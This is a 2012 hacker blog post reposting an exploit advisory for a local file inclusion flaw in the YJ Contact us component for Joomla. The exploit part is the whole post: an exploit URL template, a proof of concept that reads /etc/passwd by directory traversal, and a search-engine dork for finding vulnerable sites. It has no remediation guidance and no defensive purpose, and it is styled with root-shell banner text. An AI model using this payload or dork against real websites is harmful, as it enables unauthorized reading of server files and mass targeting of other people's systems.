.
Dr. Cruzz. Diberdayakan oleh Blogger.

Imagination Will Take You Everywhere, Get the Codes and Feel the Soul
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@serv1: ~]#...
./e0f
[+] Post Title :

Joomla YJ Contact us Component Local File Inclusion Vulnerability


[+] Date : Rabu, 01 Februari 2012
[+] Author : Dr. Cruzz
[+] Link : http://xcruzz.blogspot.com/2012/02/joomla-yj-contact-us-component-local_01.html
[+] Type :
================================================================================
  - YJ Contact us - Enhanced Joomla Contact Form <= Local File Inclusion Vulnerability
    Software : YJ Contact us - Enhanced Joomla Contact Form
    Vendor   : http://www.youjoomla.com/yj-contact-us-enhanced-joomla-contact-form-2.html
    Author   : Mego
    Contact  : nowar204[at]hotmail[dot]com
    Home  : NONE
================================================================================
  - Exploit
    http://localhost/[path]/index.php?option=com_yjcontactus&view=[LFI]
  - PoC
    http://localhost/[path]/index.php?option=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../../etc/passwd
  - Dork
    "com_yjcontactus"+view
================================================================================
  - Greetz
    norgod,g0ld,vnc and all brazilian c0ders
================================================================================
  - October 25 2011 - Morocco

0 komentar:

Posting Komentar